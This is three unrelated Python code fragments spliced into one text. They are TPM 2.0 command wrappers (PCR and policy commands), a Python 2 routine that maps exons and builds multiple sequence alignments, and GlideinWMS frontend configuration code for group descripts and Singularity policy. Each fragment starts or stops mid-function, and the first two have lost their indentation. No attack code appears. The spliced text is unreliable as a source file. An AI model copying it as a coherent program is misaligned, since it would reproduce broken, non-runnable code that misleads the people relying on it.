pcrSelectionOut - The PCR in the returned list
pcrValues - The contents of the PCR indicated in pcrSelectOut-˃
pcrSelection[] as tagged digests
"""
req = TPM2_PCR_Read_REQUEST(pcrSelectionIn)
respBuf = self.dispatchCommand(TPM_CC.PCR_Read, req)
return self.processResponse(respBuf, PCR_ReadResponse)
# PCR_Read()
def PCR_Allocate(self, authHandle, pcrAllocation):
""" This command is used to set the desired PCR allocation of PCR and
algorithms. This command requires Platform Authorization.
Args:
authHandle (TPM_HANDLE): TPM_RH_PLATFORM+{PP}
Auth Index: 1
Auth Role: USER
pcrAllocation (TPMS_PCR_SELECTION): The requested allocation
Returns:
allocationSuccess - YES if the allocation succeeded
maxPCR - Maximum number of PCR that may be in a bank
sizeNeeded - Number of octets required to satisfy the request
sizeAvailable - Number of octets available. Computed before the allocation.
"""
req = TPM2_PCR_Allocate_REQUEST(authHandle, pcrAllocation)
respBuf = self.dispatchCommand(TPM_CC.PCR_Allocate, req)
return self.processResponse(respBuf, PCR_AllocateResponse)
# PCR_Allocate()
def PCR_SetAuthPolicy(self, authHandle, authPolicy, hashAlg, pcrNum):
""" This command is used to associate a policy with a PCR or group of
PCR. The policy determines the conditions under which a PCR may be
extended or reset.
Args:
authHandle (TPM_HANDLE): TPM_RH_PLATFORM+{PP}
Auth Index: 1
Auth Role: USER
authPolicy (int): The desired authPolicy
hashAlg (TPM_ALG_ID): The hash algorithm of the policy
pcrNum (TPM_HANDLE): The PCR for which the policy is to be set
"""
req = TPM2_PCR_SetAuthPolicy_REQUEST(authHandle, authPolicy, hashAlg, pcrNum)
respBuf = self.dispatchCommand(TPM_CC.PCR_SetAuthPolicy, req)
return self.processResponse(respBuf)
# PCR_SetAuthPolicy()
def PCR_SetAuthValue(self, pcrHandle, auth):
""" This command changes the authValue of a PCR or group of PCR.
Args:
pcrHandle (TPM_HANDLE): Handle for a PCR that may have an
authorization value set
Auth Index: 1
Auth Role: USER
auth (int): The desired authorization value
"""
req = TPM2_PCR_SetAuthValue_REQUEST(pcrHandle, auth)
respBuf = self.dispatchCommand(TPM_CC.PCR_SetAuthValue, req)
return self.processResponse(respBuf)
# PCR_SetAuthValue()
def PCR_Reset(self, pcrHandle):
""" If the attribute of a PCR allows the PCR to be reset and proper
authorization is provided, then this command may be used to set the PCR
in all banks to zero. The attributes of the PCR may restrict the
locality that can perform the reset operation.
Args:
pcrHandle (TPM_HANDLE): The PCR to reset
Auth Index: 1
Auth Role: USER
"""
req = TPM2_PCR_Reset_REQUEST(pcrHandle)
respBuf = self.dispatchCommand(TPM_CC.PCR_Reset, req)
return self.processResponse(respBuf)
# PCR_Reset()
def PolicySigned(self, authObject, policySession, nonceTPM, cpHashA, policyRef, expiration, auth):
""" This command includes a signed authorization in a policy. The
command ties the policy to a signing key by including the Name of the
signing key in the policyDigest
Args:
authObject (TPM_HANDLE): Handle for a key that will validate the signature
Auth Index: None
policySession (TPM_HANDLE): Handle for the policy session being extended
Auth Index: None
nonceTPM (int): The policy nonce for the session
This can be the Empty Buffer.
cpHashA (int): Digest of the command parameters to which this
authorization is limited
This is not the cpHash for this command but the cpHash for the
command to which this policy session will be applied. If it is
not limited, the parameter will be the Empty Buffer.
policyRef (int): A reference to a policy relating to the
authorization may be the Empty Buffer
Size is limited to be no larger than the nonce size supported on
the TPM.
expiration (int): Time when authorization will expire, measured in
seconds from the time that nonceTPM was generated
If expiration is non-negative, a NULL Ticket is returned. See 23.2.5.
auth (TPMU_SIGNATURE): Signed authorization (not optional)
(One of [TPMS_SIGNATURE_RSASSA, TPMS_SIGNATURE_RSAPSS,
TPMS_SIGNATURE_ECDSA, TPMS_SIGNATURE_ECDAA, TPMS_SIGNATURE_SM2,
TPMS_SIGNATURE_ECSCHNORR, TPMT_HA, TPMS_SCHEME_HASH,
TPMS_NULL_SIGNATURE])
Returns:
timeout - Implementation-specific time value, used to indicate to
the TPM when the ticket expires
NOTE If policyTicket is a NULL Ticket, then this shall be
the Empty Buffer.
policyTicket - Produced if the command succeeds and expiration in
the command was non-zero; this ticket will use the
TPMT_ST_AUTH_SIGNED structure tag. See 23.2.5
"""
req = TPM2_PolicySigned_REQUEST(authObject, policySession, nonceTPM, cpHashA, policyRef, expiration, auth)
respBuf = self.dispatchCommand(TPM_CC.PolicySigned, req)
return self.processResponse(respBuf, PolicySignedResponse)
# PolicySigned()
def PolicySecret(self, authHandle, policySession, nonceTPM, cpHashA, policyRef, expiration):
""" This command includes a secret-based authorization to a policy. The
caller proves knowledge of the secret value using an authorization
session using the authValue associated with authHandle. A password
session, an HMAC session, or a policy session containing
TPM2_PolicyAuthValue() or TPM2_PolicyPassword() will satisfy this requirement.
Args:
authHandle (TPM_HANDLE): Handle for an entity providing the authorization
Auth Index: 1
Auth Role: USER
policySession (TPM_HANDLE): Handle for the policy session being extended
Auth Index: None
nonceTPM (int): The policy nonce for the session
This can be the Empty Buffer.
cpHashA (int): Digest of the command parameters to which this
authorization is limited
This not the cpHash for this command but the cpHash for the
command to which this policy session will be applied. If it is
not limited, the parameter will be the Empty Buffer.
policyRef (int): A reference to a policy relating to the
authorization may be the Empty Buffer
Size is limited to be no larger than the nonce size supported on
the TPM.
expiration (int): Time when authorization will expire, measured in
seconds from the time that nonceTPM was generated
If expiration is non-negative, a NULL Ticket is returned. See 23.2.5.
Returns:
timeout - Implementation-specific time value used to indicate to the
TPM when the ticket expires
policyTicket - Produced if the command succeeds and expiration in
the command was non-zero ( See 23.2.5). This ticket
will use the TPMT_ST_AUTH_SECRET structure tag
"""
req = TPM2_PolicySecret_REQUEST(authHandle, policySession, nonceTPM, cpHashA, policyRef, expiration)
respBuf = self.dispatchCommand(TPM_CC.PolicySecret, req)
return self.processResponse(respBuf, PolicySecretResponse)
# PolicySecret()
def PolicyTicket(self, policySession, timeout, cpHashA, policyRef, authName, ticket):
""" This command is similar to TPM2_PolicySigned() except that it takes
a ticket instead of a signed authorization. The ticket represents a
validated authorization that had an expiration time associated with it.
Args:
policySession (TPM_HANDLE): Handle for the policy session being extended
Auth Index: None
timeout (int): Time when authorization will expire
The contents are TPM specific. This shall be the value returned
when ticket was produced.
cpHashA (int): Digest of the command parameters to which this
authorization is limited
If it is not limited, the parameter will be the Empty Buffer.
policyRef (int): Reference to a qualifier for the policy may be the
Empty Buffer
authName (int): Name of the object that provided the authorization
ticket (TPMT_TK_AUTH): An authorization ticket returned by the TPM
in response to a TPM2_PolicySigned() or TPM2_PolicySecret()
"""
req = TPM2_PolicyTicket_REQUEST(policySession, timeout, cpHashA, policyRef, authName, ticket)
respBuf = self.dispatchCommand(TPM_CC.PolicyTicket, req)
return self.processResponse(respBuf)
# PolicyTicket()
def PolicyOR(self, policySession, pHashList):
""" This command allows options in authorizations without requiring that
the TPM evaluate all of the options. If a policy may be satisfied by
different sets of conditions, the TPM need only evaluate one set that
satisfies the policy. This command will indicate that one of the
required sets of conditions has been satisfied.
Args:
policySession (TPM_HANDLE): Handle for the policy session being extended
Auth Index: None
pHashList (TPM2B_DIGEST): The list of hashes to check for a match
"""
req = TPM2_PolicyOR_REQUEST(policySession, pHashList)
respBuf | |
extends to higher residues
# than the map_peptide2cds
raise ValueError("not able to fix exon boundary incongruence: %i != %i." %
(ee[-1].mPeptideTo, map_p2c.getColTo()))
old_peptide_end, old_genome_end = ee[-
1].mPeptideTo, ee[-1].mGenomeTo
ee[-1].mPeptideTo -= d
ee[-1].mGenomeTo -= d
d = ee[-1].mPeptideTo - ee[-1].mPeptideFrom
if d <= 0:
del ee[-1]
ee[-1].mPeptideTo += d
ee[-1].mGenomeTo += d
E.debug("%s: fixed exon end from %i to %i (%i to %i)" %
(key, old_peptide_end, ee[-1].mPeptideTo,
old_genome_end, ee[-1].mGenomeTo))
is_negative_strand = ee[0].mSbjctStrand == "-"
# note that exon coordinates are already inverted
# and negative strand coordinates are negative
# Thus the following works for both forward and reverse strand
genome_start = ee[0].mGenomeFrom
genome_starts[key] = (is_negative_strand, genome_start)
map_c2g = alignlib_lite.py_makeAlignmentBlocks()
for e in ee:
# map boundaries
# note: map_p2c is in 1 based coordinates
peptide_from = MapC2PRight(map_p2c, e.mPeptideFrom)
peptide_to = MapC2PRight(map_p2c, e.mPeptideTo)
if peptide_from < 0 or peptide_to < 0:
E.debug("%s" % str(e))
E.warn("%s of length %i: exon boundary could not be mapped: from %i->%i to %i->%i" %
(key, len(input[key]),
e.mPeptideFrom, peptide_from,
e.mPeptideTo, peptide_to))
E.debug(
"%s" % str(alignlib_lite.py_AlignmentFormatEmissions(map_p2c)))
nunmappable += 1
continue
e.mCdsFrom = e.mPeptideFrom
e.mCdsTo = e.mPeptideTo
e.mPeptideFrom = peptide_from
e.mPeptideTo = peptide_to
# build map of cds to genomic sequence
map_c2g.addDiagonal(
e.mCdsFrom, e.mCdsTo, e.mGenomeFrom - genome_start - e.mCdsFrom)
map_cds2genome[key] = map_c2g
E.info("checked exon boundaries against cds: missing=%i, differences=%i, fixed_stops=%i, deleted_empty=%i, nunmappable=%i" %
(nmissing, ndifferences, nstop_codons, ndeleted_empty, nunmappable))
else:
E.info("no checking of exon boundaries - assumed to be correct.")
E.info("removing stop codons.")
#
# remove stop codons from exons
#
# Tests whether the length of the peptide sequence and
# the exon correspond. If there is a difference, truncate.
# Note: this fails for pseudogenes. Thus use peptide2cds
# to map these
for key, ee in exons.items():
reference_length = 3 * len(input[key])
if ee[-1].mPeptideTo > reference_length:
ee[-1].mPeptideTo -= 3
ee[-1].mGenomeTo -= 3
if ee[-1].mPeptideTo - ee[-1].mPeptideFrom == 0:
del ee[-1]
for e in ee:
e.mCdsFrom = e.mPeptideFrom
e.mCdsTo = e.mPeptideTo
map_peptide2cds = {}
E.debug("read exons for %i sequences." % len(exons))
else:
# if no exons are given, all transcripts are assumed to be single exon
# genes
exons = {}
for gene, identifiers in map_gene2ids.items():
for id in identifiers:
e = Exons.Exon()
e.mQueryToken = id
e.mPeptideFrom = map_peptide2cds[id].getRowFrom()
e.mPeptideTo = map_peptide2cds[id].getRowTo()
e.mGenomeFrom = map_peptide2cds[id].getColFrom()
e.mGenomeTo = map_peptide2cds[id].getColTo()
e.mCdsFrom = e.mGenomeFrom
e.mCdsTo = e.mGenomeTo
exons[id] = [e]
##########################################################################
##########################################################################
##########################################################################
# Build the packed alignment
##########################################################################
unaligned = Mali.Mali()
unaligned_cds = Mali.Mali()
map_gene2fragments = {}
pseudogenes = set()
nwarnings_length, nwarnings_sequence = 0, 0
nwarnings_empty = 0
for gene, identifiers in map_gene2ids.items():
# collect all exons and sort them by genomic location
exon_list = []
is_seleno = False
for id in identifiers:
exon_list += exons[id]
is_seleno |= id in selenoproteins
# sort such that the larger exons come first
# if they start at the same residue
exon_list.sort(
lambda x, y: cmp((x.mGenomeFrom, -x.mGenomeTo), (y.mGenomeFrom, -y.mGenomeTo)))
e = exon_list[0]
max_to = e.mGenomeTo
overlapping_exons = [e]
fragments = []
for e in exon_list[1:]:
# ignore empty exons
# Example for empty exon: ENSP00000344726, where the last exon
# just consists of the stop codon. Should be filtered out, but
# you never know.
if e.mPeptideFrom == e.mPeptideTo:
continue
if max_to <= e.mGenomeFrom:
# no overlap, process chunks
fragments += buildFragments(overlapping_exons, input,
pseudogenes, options,
map_peptide2cds=map_peptide2cds,
cds_sequences=cds_sequences)
overlapping_exons = []
overlapping_exons.append(e)
max_to = max(e.mGenomeTo, max_to)
fragments += buildFragments(overlapping_exons, input, pseudogenes, options,
map_peptide2cds=map_peptide2cds,
cds_sequences=cds_sequences)
map_gene2fragments[gene] = fragments
# build unaligned sequence
sequence = options.sequence_separator.join(
map(lambda x: x.mSequence, fragments))
# sanity check if cds sequence is given: does it correspond to peptide
# sequence?
if cds_sequences:
cds_sequence = options.sequence_separator.join(
map(lambda x: x.mCdsSequence, fragments))
mapped_sequence = Genomics.translate(
cds_sequence, is_seleno=is_seleno)
if mapped_sequence != sequence:
if len(mapped_sequence) == len(sequence):
ncounts = 0
for x in range(len(mapped_sequence)):
if mapped_sequence[x].upper() != sequence[x].upper():
E.info("gene %s: amino acid position %i has changed from %s to %s" % (
gene, x, sequence[x], mapped_sequence[x]))
ncounts += 1
if ncounts > 0:
E.warn(
"gene %s: %i amino acid positions have changed" % (gene, ncounts))
nwarnings_sequence += 1
else:
E.warn(
"gene %s: back-translated sequence is different from original" % (gene))
E.warn(" Original : %s" % (sequence))
E.warn(" Backtrans: %s" % (mapped_sequence))
E.warn("assumed to be pseudogenes and ignored.")
nwarnings_sequence += 1
if options.strict:
raise ValueError(
"gene %s: back-translated sequence has different length from original\n" % (gene))
unaligned.addSequence(gene, 0, len(sequence), sequence)
unaligned_cds.addSequence(gene, 0, len(cds_sequence), cds_sequence)
if "unaligned_aa" in options.output:
writeToFile(unaligned, "unaligned_aa", options, is_aligned=False)
if "unaligned_na" in options.output:
writeToFile(unaligned_cds, "unaligned_na", options, is_aligned=False)
if options.stop_at == "unaligned":
unaligned.writeToFile(options.stdout, format=options.output_format)
E.Stop()
sys.exit(0)
##########################################################################
##########################################################################
##########################################################################
# Perform the multiple alignment
##########################################################################
muscle = WrapperMuscle.Muscle()
aligned = muscle.Run(unaligned)
# substitute U for X in selenoproteins
# note that this is a greedy substitution - genuine stop-codons
# will be overridden as well.
if selenoproteins:
for gene_id, s in aligned.items():
for pid in map_gene2ids[gene_id]:
if pid in selenoproteins:
s.mString = s.mString.replace("X", "U").replace("x", "u")
break
if "aligned_aa" in options.output:
writeToFile(aligned, "aligned_aa", options)
# perform sanity checks
# all aligned sequences should have the same length
# all sequences should be identical to the unaligned sequences
width = aligned.getWidth()
for key, val in aligned.items():
if len(val.mString) != width:
raise ValueError(
"incompatible lenghts in %s: %i should be %i." % (key, len(val.mString), width))
try:
s1 = re.sub("[%s]" % options.gap_chars, "", unaligned[key])
except KeyError:
continue
s2 = re.sub("[%s]" % options.gap_chars, "", val.mString)
if s1.upper() != s2.upper():
raise ValueError(
"sequence changed in %s:\nold=%s\nnew=%s" % (key, s1, s2))
if options.stop_at == "aligned":
aligned.writeToFile(options.stdout, format=options.output_format)
E.Stop()
sys.exit(0)
##########################################################################
##########################################################################
##########################################################################
# output the packed alignment as nucleotides
# The output does not contain any frameshifts that might have been
# present in the original sequences
if "aligned_na" in options.output:
aligned_cds = Mali.Mali()
for id in aligned.getIdentifiers():
entry = aligned.getEntry(id)
s = []
c = 0
gc = aligned.mGapChar
cds_sequence = unaligned_cds[id]
for x in range(len(entry.mString)):
if entry.mString[x] == gc:
s.append(gc * 3)
else:
s.append(cds_sequence[c:c + 3])
c += 3
aligned_cds.addSequence(
id, entry.mFrom * 3, entry.mTo * 3, "".join(s))
writeToFile(aligned_cds, "aligned_na", options)
##########################################################################
##########################################################################
##########################################################################
# unpack the protein level alignment
# columns stay the same, but alignments with multiple transcripts per gene
# are unpacked.
##########################################################################
unpacked = Mali.Mali()
for id in aligned.getIdentifiers():
gene = id
sequence = aligned[id]
entry = aligned.getEntry(id)
fragments = map_gene2fragments[gene]
# split aligned sequence in its constituent parts
transitions = []
c = 0
for x in fragments:
c += len(x.mSequence)
transitions.append(c)
segments = entry.getSegments(transitions)
if len(segments) != len(transitions):
for x in range(min(len(segments), len(transitions))):
segment = sequence[segments[x][0]:segments[x][1]]
if options.loglevel >= 8:
options.stdlog.write("# %s: transition=%i segment=%i-%i members=%s\n# %s: sequence=%s segment=%s\n" % (id,
transitions[
x],
segments[
x][0],
segments[
x][1],
fragments[
x].mMembers,
id,
fragments[
x].mSequence,
segment))
print "# %s: nfragments=%i" % (id, len(fragments))
print "# %s: nsegments=%i segments=%s lsequence=%i" % (id, len(segments), str(segments), len(sequence))
print "# %s: ntransitions=%i transitions=%s lgene=%i" % (id, len(transitions), transitions, len(unaligned[gene]))
print sequence
print unaligned[gene]
assert (len(segments) == len(transitions))
sequences = {}
for member in map_gene2ids[gene]:
sequences[member] = []
fragments = map_gene2fragments[id]
for x in range(len(segments)):
segment = sequence[segments[x][0]:segments[x][1]]
if options.loglevel >= 8:
options.stdlog.write("# %s: transition=%i segment=%i-%i members=%s\n# %s: sequence=%s segment=%s\n" % (id,
transitions[
x],
segments[
x][0],
segments[
x][1],
fragments[
x].mMembers,
id,
fragments[
x].mSequence,
segment))
added = set()
# if it was a consensus string, deconvolute with multiple alignment
if fragments[x].mMali:
for member in fragments[x].mMembers:
s1 = fragments[x].mMali.getSequence(member).mString
s = []
i = 0
for ch in segment:
if ch in options.gap_chars:
s.append(ch)
else:
s.append(s1[i])
i += 1
sequences[member].append("".join(s))
added.add(member)
else:
# simply add the segment
for member in fragments[x].mMembers:
sequences[member].append(segment)
added.add(member)
segment = options.gap_char * (len(segment))
for member in map_gene2ids[gene]:
if member not in added:
sequences[member].append(segment)
for member in map_gene2ids[gene]:
s = "".join(sequences[member])
if len(re.sub("[%s]" % options.gap_chars, "", s)) == 0:
E.warn("empty sequence for %s." % member)
nwarnings_empty += 1
continue
unpacked.addSequence(member, 0, -1, s)
if options.stop_at == "unpacked":
aligned.writeToFile(options.stdout, format=options.output_format)
E.Stop()
sys.exit(0)
# perform sanity checks
# all aligned sequences should have the | |
{description}[{attr_name}]: {str(e)}")
def validate_attribute(attr_name, attr_val):
    """Check that the attribute value is valid; raise RuntimeError otherwise.

    Empty/falsy names or values are accepted as-is (nothing to validate).
    """
    if not (attr_name and attr_val):
        return
    # Consider adding a common one in cWParamDict
    # Series of if/elif sections validating the attributes
    if attr_name == "GLIDEIN_Singularity_Use":
        allowed_values = ("DISABLE_GWMS", "NEVER", "OPTIONAL", "PREFERRED", "REQUIRED")
        if attr_val not in allowed_values:
            raise RuntimeError(
                "Invalid value for GLIDEIN_Singularity_Use: %s not in DISABLE_GWMS, NEVER, OPTIONAL, PREFERRED, REQUIRED."
                % attr_val
            )
def add_attr_unparsed_real(attr_name, params, dicts):
    """Add one attribute from ``params`` to the configuration dictionaries.

    Stores the value in the params or consts dict, and registers it in the
    vars dict (or checks compatibility with an existing entry) when glidein
    or job publishing is requested.
    """
    attr_obj = params.attrs[attr_name]
    if attr_obj.value is None:
        raise RuntimeError(f"Attribute '{attr_name}' does not have a value: {attr_obj}")

    attr_val = params.extract_attr_val(attr_obj)
    validate_attribute(attr_name, attr_val)

    # attr_obj.type=="expr" is now used for HTCondor expression
    is_expr = False
    if is_true(attr_obj.parameter):
        dicts["params"].add_extended(attr_name, is_expr, attr_val)
    else:
        dicts["consts"].add(attr_name, attr_val)

    publish_glidein = is_true(attr_obj.glidein_publish)
    publish_job = is_true(attr_obj.job_publish)
    if not (publish_glidein or publish_job):
        # not published anywhere - no vars entry needed
        return
    if attr_name not in dicts["vars"]:
        dicts["vars"].add_extended(attr_name, attr_obj.type, None, None, False, publish_glidein, publish_job)
        return
    # already in the var file, check if compatible
    var_el = dicts["vars"][attr_name]
    var_type = var_el[0]
    if (
        ((attr_obj.type == "int") and (var_type != "I"))
        or ((attr_obj.type == "expr") and (var_type == "I"))
        or ((attr_obj.type == "string") and (var_type == "I"))
    ):
        raise RuntimeError(f"Types not compatible ({attr_obj.type},{var_type})")
    if publish_glidein and (var_el[4] == "N"):
        raise RuntimeError("Cannot force glidein publishing")
    if publish_job and (var_el[5] == "-"):
        raise RuntimeError("Cannot force job publishing")
###################################
# Create the frontend descript file
def populate_frontend_descript(work_dir, frontend_dict, active_sub_list, params):  # will be modified
    """Populate the frontend descript dict and the list of enabled groups.

    Args:
        work_dir (str): frontend work directory
        frontend_dict: description dictionary, modified in place (side effect)
        active_sub_list (list): reset and refilled in place with the names of
            the enabled groups (side effect)
        params: frontend configuration parameters

    Raises:
        RuntimeError: if security.classad_proxy is missing or is not a file
    """
    frontend_dict.add("DowntimesFile", params.downtimes_file)
    frontend_dict.add("FrontendName", params.frontend_name)
    frontend_dict.add("WebURL", params.web_url)
    if hasattr(params, "monitoring_web_url") and (params.monitoring_web_url is not None):
        frontend_dict.add("MonitoringWebURL", params.monitoring_web_url)
    else:
        frontend_dict.add("MonitoringWebURL", params.web_url.replace("stage", "monitor"))
    # TODO: refcred (refactoring of credentials) remove proxy requirement, replace w/ any credential, maybe ID
    if params.security.classad_proxy is None:
        raise RuntimeError("Missing security.classad_proxy")
    params.subparams.data["security"]["classad_proxy"] = os.path.abspath(params.security.classad_proxy)
    if not os.path.isfile(params.security.classad_proxy):
        raise RuntimeError("security.classad_proxy(%s) is not a file" % params.security.classad_proxy)
    frontend_dict.add("ClassAdProxy", params.security.classad_proxy)
    frontend_dict.add("SymKeyType", params.security.sym_key)
    # BUGFIX: was the bare expression `active_sub_list[:]`, which is a no-op;
    # `del` actually empties the caller's list in place as intended
    del active_sub_list[:]  # erase all
    for sub in list(params.groups.keys()):
        if is_true(params.groups[sub].enabled):
            active_sub_list.append(sub)
    frontend_dict.add("Groups", ",".join(active_sub_list))
    frontend_dict.add("LoopDelay", params.loop_delay)
    frontend_dict.add("AdvertiseDelay", params.advertise_delay)
    frontend_dict.add("GroupParallelWorkers", params.group_parallel_workers)
    frontend_dict.add("RestartAttempts", params.restart_attempts)
    frontend_dict.add("RestartInterval", params.restart_interval)
    frontend_dict.add("AdvertiseWithTCP", params.advertise_with_tcp)
    frontend_dict.add("AdvertiseWithMultiple", params.advertise_with_multiple)
    frontend_dict.add("MonitorDisplayText", params.monitor_footer.display_txt)
    frontend_dict.add("MonitorLink", params.monitor_footer.href_link)
    frontend_dict.add("CondorConfig", os.path.join(work_dir, cvWConsts.FRONTEND_CONDOR_CONFIG_FILE))
    frontend_dict.add("LogDir", params.log_dir)
    frontend_dict.add("ProcessLogs", str(params.log_retention["process_logs"]))
    frontend_dict.add("IgnoreDownEntries", params.config.ignore_down_entries)
    frontend_dict.add("MaxIdleVMsTotal", params.config.idle_vms_total.max)
    frontend_dict.add("CurbIdleVMsTotal", params.config.idle_vms_total.curb)
    frontend_dict.add("MaxIdleVMsTotalGlobal", params.config.idle_vms_total_global.max)
    frontend_dict.add("CurbIdleVMsTotalGlobal", params.config.idle_vms_total_global.curb)
    frontend_dict.add("MaxRunningTotal", params.config.running_glideins_total.max)
    frontend_dict.add("CurbRunningTotal", params.config.running_glideins_total.curb)
    frontend_dict.add("MaxRunningTotalGlobal", params.config.running_glideins_total_global.max)
    frontend_dict.add("CurbRunningTotalGlobal", params.config.running_glideins_total_global.curb)
    frontend_dict.add("HighAvailability", params.high_availability)
#######################
# Populate group descript
def populate_group_descript(work_dir, group_descript_dict, sub_name, sub_params):  # will be modified
    """Populate the group descript dict with the group's names, maps and limits.

    Args:
        work_dir (str): group work directory
        group_descript_dict: description dictionary, modified in place (side effect)
        sub_name (str): group name
        sub_params: group section of the configuration
    """
    cfg = sub_params.config
    # (key, value) pairs, written in the same order the entries were historically added
    entries = (
        ("GroupName", sub_name),
        ("MapFile", os.path.join(work_dir, cvWConsts.GROUP_MAP_FILE)),
        ("MapFileWPilots", os.path.join(work_dir, cvWConsts.GROUP_WPILOTS_MAP_FILE)),
        ("IgnoreDownEntries", cfg.ignore_down_entries),
        ("MaxRunningPerEntry", cfg.running_glideins_per_entry.max),
        ("MinRunningPerEntry", cfg.running_glideins_per_entry.min),
        ("FracRunningPerEntry", cfg.running_glideins_per_entry.relative_to_queue),
        ("MaxIdlePerEntry", cfg.idle_glideins_per_entry.max),
        ("ReserveIdlePerEntry", cfg.idle_glideins_per_entry.reserve),
        ("IdleLifetime", cfg.idle_glideins_lifetime.max),
        ("MaxIdleVMsPerEntry", cfg.idle_vms_per_entry.max),
        ("CurbIdleVMsPerEntry", cfg.idle_vms_per_entry.curb),
        ("MaxIdleVMsTotal", cfg.idle_vms_total.max),
        ("CurbIdleVMsTotal", cfg.idle_vms_total.curb),
        ("MaxRunningTotal", cfg.running_glideins_total.max),
        ("CurbRunningTotal", cfg.running_glideins_total.curb),
        ("MaxMatchmakers", cfg.processing_workers.matchmakers),
        ("RemovalType", cfg.glideins_removal.type),
        ("RemovalWait", cfg.glideins_removal.wait),
        ("RemovalRequestsTracking", cfg.glideins_removal.requests_tracking),
        ("RemovalMargin", cfg.glideins_removal.margin),
    )
    for key, value in entries:
        group_descript_dict.add(key, value)
#####################################################
# Populate values common to frontend and group dicts
# Map from the XML match_attr "type" names to the one-letter codes stored in
# the serialized *MatchAttrs tuples (see match_attrs_to_array below)
MATCH_ATTR_CONV = {"string": "s", "int": "i", "real": "r", "bool": "b"}
def apply_group_singularity_policy(descript_dict, sub_params, params):
    """Tighten factory/match expressions according to GLIDEIN_Singularity_Use.

    The group-level attribute overrides the global one. For REQUIRED groups,
    only factories advertising a usable GLIDEIN_SINGULARITY_REQUIRE are matched;
    for NEVER groups, factories requiring Singularity are excluded. When a
    restriction is applied, GLIDEIN_SINGULARITY_REQUIRE is appended to the
    queried factory match attributes.

    Args:
        descript_dict: group description dictionary, modified in place (side effect)
        sub_params: attributes in the group section of the XML file
        params: attributes in the global section of the XML file
    """
    import ast  # local import: safely parse the serialized FactoryMatchAttrs list

    glidein_singularity_use = None
    query_expr = descript_dict["FactoryQueryExpr"]
    match_expr = descript_dict["MatchExpr"]
    ma_arr = []
    match_attrs = None
    # Consider GLIDEIN_Singularity_Use from Group level, else global
    if "GLIDEIN_Singularity_Use" in sub_params.attrs:
        glidein_singularity_use = sub_params.attrs["GLIDEIN_Singularity_Use"]["value"]
    elif "GLIDEIN_Singularity_Use" in params.attrs:
        glidein_singularity_use = params.attrs["GLIDEIN_Singularity_Use"]["value"]
    if glidein_singularity_use:
        descript_dict.add("GLIDEIN_Singularity_Use", glidein_singularity_use)
        if glidein_singularity_use == "REQUIRED":  # avoid NEVER and undefined (probably will not have Singularity)
            # NOTE: 3.5 behavior is different from 3.4.x or earlier, the SINGULARITY_BIN meaning changes
            # SINGULARITY_BIN is no more used as flag to select Singularity, only for the binary selection
            query_expr = (
                '(%s) && (GLIDEIN_SINGULARITY_REQUIRE=!="NEVER") && (GLIDEIN_SINGULARITY_REQUIRE=!=UNDEFINED)'
                % query_expr
            )
            match_expr = (
                '(%s) and (glidein["attrs"].get("GLIDEIN_SINGULARITY_REQUIRE", "NEVER") != "NEVER")' % match_expr
            )
            ma_arr.append(("GLIDEIN_SINGULARITY_REQUIRE", "s"))
        elif glidein_singularity_use == "NEVER":  # avoid REQUIRED, REQUIRED_GWMS
            query_expr = (
                '(%s) && (GLIDEIN_SINGULARITY_REQUIRE=!="REQUIRED") && (GLIDEIN_SINGULARITY_REQUIRE=!="REQUIRED_GWMS")'
                % query_expr
            )
            match_expr = (
                '(%s) and (glidein["attrs"].get("GLIDEIN_SINGULARITY_REQUIRE", "NEVER")[:8] != "REQUIRED")' % match_expr
            )
            ma_arr.append(("GLIDEIN_SINGULARITY_REQUIRE", "s"))
        if ma_arr:
            # ast.literal_eval replaces eval(): the stored value is a repr() of a
            # list of tuples and literal_eval cannot execute arbitrary code
            match_attrs = ast.literal_eval(descript_dict["FactoryMatchAttrs"]) + ma_arr
            descript_dict.add("FactoryMatchAttrs", repr(match_attrs), allow_overwrite=True)
        descript_dict.add("FactoryQueryExpr", query_expr, allow_overwrite=True)
        descript_dict.add("MatchExpr", match_expr, allow_overwrite=True)
def validate_singularity(descript_dict, sub_params, params, name):
    """Ensure a group that may use Singularity provides at least one user wrapper.

    The group-level GLIDEIN_Singularity_Use attribute overrides the global one.
    Only values that allow Singularity trigger the wrapper check.

    Args:
        descript_dict: dictionaries with user files (group level)
        sub_params: attributes in the group section of the XML file
        params: attributes in the general section of the XML file
        name (str): group name

    Raises:
        RuntimeError: when Singularity is allowed but no wrapper file exists
    """
    use_value = ""
    # first matching source wins: group section, then global section
    for attr_source in (sub_params.attrs, params.attrs):
        if "GLIDEIN_Singularity_Use" in attr_source:
            use_value = attr_source["GLIDEIN_Singularity_Use"]["value"]
            break
    if use_value not in ("OPTIONAL", "PREFERRED", "REQUIRED", "REQUIRED_GWMS"):
        return
    # Using Singularity: a wrapper must exist either in the group files...
    if has_file_wrapper(descript_dict):
        return
    # ...or in the global files (main file dict is not accessible, use params)
    if has_file_wrapper_params(params.files):
        return
    raise RuntimeError(
        "Error: group %s allows Singularity (%s) but has no wrapper file in the files list" % (name, use_value)
    )
def apply_multicore_policy(descript_dict):
    """Restrict matching to sites with enough CPUs and query the CPU attributes.

    Args:
        descript_dict: description dictionary, modified in place (side effect)
    """
    import ast  # local import: safely parse the serialized match-attrs lists

    match_expr = descript_dict["MatchExpr"]
    # Only consider sites that provide enough GLIDEIN_CPUS (GLIDEIN_ESTIMATED_CPUS) for jobs to run
    match_expr = '(%s) and (getGlideinCpusNum(glidein) >= int(job.get("RequestCpus", 1)))' % match_expr
    descript_dict.add("MatchExpr", match_expr, allow_overwrite=True)
    # Add GLIDEIN_CPUS, GLIDEIN_ESTIMATED_CPUS and GLIDEIN_NODES to the list of attrs queried in glidefactory classad.
    # ast.literal_eval replaces eval(): the stored value is a repr() of a list of
    # tuples and literal_eval cannot execute arbitrary code
    fact_ma = ast.literal_eval(descript_dict["FactoryMatchAttrs"]) + [
        ("GLIDEIN_CPUS", "s"),
        ("GLIDEIN_ESTIMATED_CPUS", "s"),
        ("GLIDEIN_NODES", "s"),
    ]
    descript_dict.add("FactoryMatchAttrs", repr(fact_ma), allow_overwrite=True)
    # Add RequestCpus to the list of attrs queried in jobs classad
    job_ma = ast.literal_eval(descript_dict["JobMatchAttrs"]) + [("RequestCpus", "i")]
    descript_dict.add("JobMatchAttrs", repr(job_ma), allow_overwrite=True)
def get_pool_list(credential):
    """Expand a credential's pool index specification into padded strings.

    The "pool_idx_list" value is a comma-separated list of indexes and
    "lo-hi" ranges; each resulting index is zero-filled to "pool_idx_len"
    characters (no padding when the length is unset).

    Args:
        credential (dict): must provide "pool_idx_len" and "pool_idx_list"

    Returns:
        list: expanded, zero-padded index strings
    """
